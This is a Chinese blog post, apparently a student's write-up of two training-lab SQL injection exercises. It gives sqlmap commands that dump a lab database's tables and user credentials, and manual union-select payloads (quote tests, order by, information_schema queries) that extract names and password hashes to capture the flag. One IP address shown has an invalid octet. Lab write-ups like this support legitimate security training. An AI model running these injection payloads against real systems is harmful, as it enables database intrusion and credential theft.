墨者学院靶场练习

1.SQL注入漏洞测试(布尔盲注)

首先进入靶场,
然后点击上图通知,进入
墨者学院靶场练习_第1张图片然后打开sqlmap墨者学院靶场练习_第2张图片
输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名墨者学院靶场练习_第3张图片
得到数据库名为stormgroup
然后输入sqlmap -u http://219.153.49.228:45907/new_list.php?id=1 -D stormgroup --tables
爆出该数据库内的表
得到两个表,显然我们要member
输入sqlmap -u http://219.153.49.228:45907/new_list.php?id=1 -D stormgroup -T -member --columns

终于我们得到了可爱的name和password
然后激动人心的一刻到了
输入sqlmap -u http://219.153.49.228:45907/new_list.php?id=1 -D stormgroup -T -member -C name,password --dump
哈哈哈,得到了两个用户和密码,经过尝试,md5解得的两个密码都不能用,what’s happened???(难受)
上一次第二个密码都能进去!!!
墨者学院靶场练习_第4张图片
OKK…

SQL手工注入漏洞测试(MySQL数据库-字符型

(这题没多大懂)
点通知进入
墨者学院靶场练习_第5张图片
首先判断是否存在判断点
加 ‘ 出错,
加 ’ and 1=1%23正常,加‘ and 1=2%23出错
墨者学院靶场练习_第6张图片
存在注入点,然后判断字段数
加’ order by n%23(n为1,2,3…)
墨者学院靶场练习_第7张图片

到 5 时出错,即字段数为4
然后判断回显位置,输入id=1’ union select 1,2,3,4%23墨者学院靶场练习_第8张图片
然后再判断数据库和用户,输入id=1’ union select 1,database(),user(),4%23
墨者学院靶场练习_第9张图片再查寻表,输入id=1’ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()%23
墨者学院靶场练习_第10张图片
然后再查询字段,输入id=1’ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘stormgroup_member’%23
墨者学院靶场练习_第11张图片发现了我们梦寐以求的name和password,然后查询这两个字段值,输入id=’ union select 1,group_concat(name),group_concat(password),4 from stormgroup_member %23

墨者学院靶场练习_第12张图片
,MD5解码
登录,得到flag!
墨者学院靶场练习_第13张图片

你可能感兴趣的:(墨者学院靶场练习)